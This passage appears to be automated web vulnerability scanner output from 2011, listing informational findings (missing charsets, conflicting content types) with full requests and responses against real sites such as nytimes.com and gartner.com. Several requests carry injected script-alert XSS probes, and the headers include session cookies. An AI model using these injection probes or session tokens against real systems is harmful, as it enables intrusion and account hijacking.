-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR
...[SNIP]...
32.2. https://client.poynerspruill.com/Pages/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /Pages/Home.aspx

Request

GET /Pages/Home.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 41418
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:42:24 GMT
Last-Modified: Thu, 12 May 2011 16:42:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:42:24 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
32.3. https://client.poynerspruill.com/pages/changepassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /pages/changepassword.aspx

Request

GET /pages/changepassword.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://client.poynerspruill.com/Pages/Home.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 31123
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:43:19 GMT
Last-Modified: Thu, 12 May 2011 16:43:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:43:19 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
32.4. https://client.poynerspruill.com/pages/forgotpassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /pages/forgotpassword.aspx

Request

GET /pages/forgotpassword.aspx HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://client.poynerspruill.com/Pages/Home.aspx
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28835
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 16:43:22 GMT
Last-Modified: Thu, 12 May 2011 16:43:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 16:43:21 GMT

<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HEAD><meta name="GENERATOR" content="Microsoft SharePoint" /><meta name="progid" content="SharePoint.WebPartPa
...[SNIP]...
32.5. https://www.gartner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 02 Feb 2007 20:41:40 GMT
Content-Type: text/plain; charset=UTF-8
ETag: "pv0c52720205b096d8a409984861904360"
Expires: Tue, 10 May 2011 22:43:02 GMT
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S11101.C10821.A158739.RA158706.G26D16.U2A265705].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:19:51 GMT
Age: 2173
Content-Length: 894

..............h.......(....... ................................h...8..l...........a..0.g..g..g..g..u...W..w..^.............................9.g..~'...........................................j..........
...[SNIP]...
32.6. https://www.gartner.com/login/loginInitAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /login/loginInitAction.do

Request

GET /login/loginInitAction.do?method=initialize HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Set-Cookie: LoginWLSessionID=3bkJNMQQD2nxnqL2p2zQ93pRLjH08HWLknkhYc1dLHbJfTZfBQKK!421925354; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:45 GMT
ETag: "pv88e506d78098b5f6d97f17af119733a5"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.U73FCF567].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 4724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <me
...[SNIP]...
33. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/trace.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /fs_webkit/trace.js HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 03 Jun 2008 13:26:01 GMT
ETag: "126c5fd-179a-44ec30d9fac40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 6042

traceHTMLfile = 'fs_webkit/trace.html';
traceContent = '';
traceWindow = 0;
refresh = true;
traceOn = true;
function trace(msg)
{
   if (traceWindow){
       traceWindow.showMessage(msg);
   } else {
       window.
...[SNIP]...
<head>\n';
windowContents+='    <meta http-equiv="content-type" content="text\/html; charset=iso-8859-1" \/>\n';
windowContents+='    <title>
...[SNIP]...
34. HTML does not specify charset  previous  next
There are 25 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

34.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

Request

GET /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2;sz=180x300;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 451
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:54 GMT
Expires: Fri, 13 May 2011 00:42:54 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
34.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

Request

GET /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:59 GMT
Expires: Fri, 13 May 2011 00:42:59 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
34.3. http://citrix.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citrix.howardrice.com
Path:   /

Request

GET / HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/6862
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Content-Length: 268
Content-Type: text/html
Content-Location: http://citrix.howardrice.com/WebInterface.htm
Last-Modified: Tue, 23 Oct 2007 20:46:40 GMT
Accept-Ranges: bytes
ETag: "1ed051d0b515c81:10b2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:40 GMT

...<!--
WebInterface.htm
Copyright (c) 2000 - 2007 Citrix Systems, Inc. All Rights Reserved.
Web Interface 4.6.0.18291
-->
<script type="text/javascript">
<!--
window.location="https:
...[SNIP]...
34.4. http://gigablast.com/addurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /addurl

Request

GET /addurl HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1487
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:11 GMT
Last-Modified: Thu, 12 May 2011 15:16:11 GMT

<form method=get><input type=hidden name="q" value="(null)">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see below:
&nbsp; <input type=text name=ans size=5>
<input ty
...[SNIP]...
34.5. http://gigablast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gigablast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 2806
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:14:07 GMT
Last-Modified: Thu, 02 Oct 2008 01:41:24 GMT

..............h...&...........h.......(....... ................................=...<...?...>...?...>...A...?...?...?...@...@...A...>...A...@...?...?...A...@...?...@...B...?...@...A...A...A...A...A...>
...[SNIP]...
34.6. http://gigablast.com/gsa.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /gsa.html

Request

GET /gsa.html HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6143
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:19 GMT
Last-Modified: Wed, 28 Apr 2010 19:24:46 GMT

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns="http://www.w3.org/TR/REC-html40">

<head>
<title>GigaBlast Among GSA's Top Three Picks</title>
<style>
<!--
/* Style Definitions */
p.MsoNormal,
...[SNIP]...
34.7. http://gigablast.com/prcts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /prcts.html

Request

GET /prcts.html HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2891
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:19 GMT
Last-Modified: Wed, 28 Apr 2010 19:24:46 GMT

<html>
<title>Gigablast Press Release - Custom Topic Search Tool</title>

<body text=#000000 bgcolor=#ffffff link=#0000ff vlink=#0000ff alink=#000000><style><!--body,td,a,p,.h{font-family:arial,sans-
...[SNIP]...
34.8. http://gigablast.com/prdir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /prdir.html

Request

GET /prdir.html HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 3326
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:19 GMT
Last-Modified: Wed, 28 Apr 2010 19:24:46 GMT

<html>
<title>Gigablast Press Release - 500,000 Vertical Search Engines</title>

<body text=#000000 bgcolor=#ffffff link=#0000ff vlink=#0000ff alink=#000000><style><!--body,td,a,p,.h{font-family:aria
...[SNIP]...
34.9. http://gigablast.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /search

Request

GET /search HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1487
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:17 GMT
Last-Modified: Thu, 12 May 2011 15:16:17 GMT

<form method=get><input type=hidden name="q" value="(null)">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see below:
&nbsp; <input type=text name=ans size=5>
<input ty
...[SNIP]...
34.10. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /packages/html/timespeople/xmlhttprequest.html

Request

GET /packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&method=get&params=&bell=http://www.nytimes.com/svc/timespeople/bell.html HTTP/1.1
Host: timespeople.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:02 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 385

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title></title>
<script src="http://graphics8.nytimes.com/js/app/lib/json/json2-min.js" type="text/javascript" charset="utf-8
...[SNIP]...
34.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /feeds/ap/2009/05/26/ap6466854.html

Request

GET /feeds/ap/2009/05/26/ap6466854.html HTTP/1.1
Host: www.forbes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/1.3.26
Set-Cookie: RMID=adc1d6f34dcc10e0; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.forbes.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
<title>Forbes.com File Not Found</title>
<script language="JavaScript">
var fdcchannel;
var fdcsponsor;
var globalPageType = "errorPage";
var displayedSection = "";
</script>
<d
...[SNIP]...
34.12. http://www.gigablast.com/addurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /addurl

Request

GET /addurl HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1487
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:02 GMT
Last-Modified: Thu, 12 May 2011 15:16:02 GMT

<form method=get><input type=hidden name="q" value="(null)">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see below:
&nbsp; <input type=text name=ans size=5>
<input ty
...[SNIP]...
34.13. http://www.gigablast.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /search

Request

GET /search?k9h=126350&q=cat%20dog&n=10 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1488
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:02 GMT
Last-Modified: Thu, 12 May 2011 15:16:02 GMT

<form method=get><input type=hidden name="q" value="cat dog">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see below:
&nbsp; <input type=text name=ans size=5>
<input t
...[SNIP]...
34.14. http://www.google.com/recaptcha/api/image  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /recaptcha/api/image

Request

GET /recaptcha/api/image HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 500 Internal Server Error
Expires: Thu, 12 May 2011 17:05:19 GMT
Date: Thu, 12 May 2011 16:55:19 GMT
Cache-Control: public, max-age=600
Content-Type: text/html
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head></head><body><pre>An error occurred:
Input error: c: Required field must not be blank

</pre></body></html>
34.15. http://www.jdtplaw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jdtplaw.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDQSSSBBRB=MHONHPPBEJHLIKKBNDCFFDEM; BIGipServerFIRMSND13-80=1504003239.20480.0000; CP=null*; s_sess=%20flid%3D1305216566069%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaughwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaugh%3B%20s_sq%3D%3B; s_pers=%20ch_directload%3D1%7C1305218366072%3B%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216566074'%255D%255D%7C1463069366074%3B%20s_vnum%3D1307808566075%2526vn%253D1%7C1307808566075%3B%20s_invisit%3Dtrue%7C1305218366075%3B%20omtr_lv%3D1305216566076%7C1399824566076%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305218366076%3B%20s_nr%3D1305216566077%7C1307808566077%3B

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:10:38 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
34.16. http://www.mccarter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /

Request

GET / HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=McCarter+English&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:22 GMT
Server: Microsoft-IIS/6.0
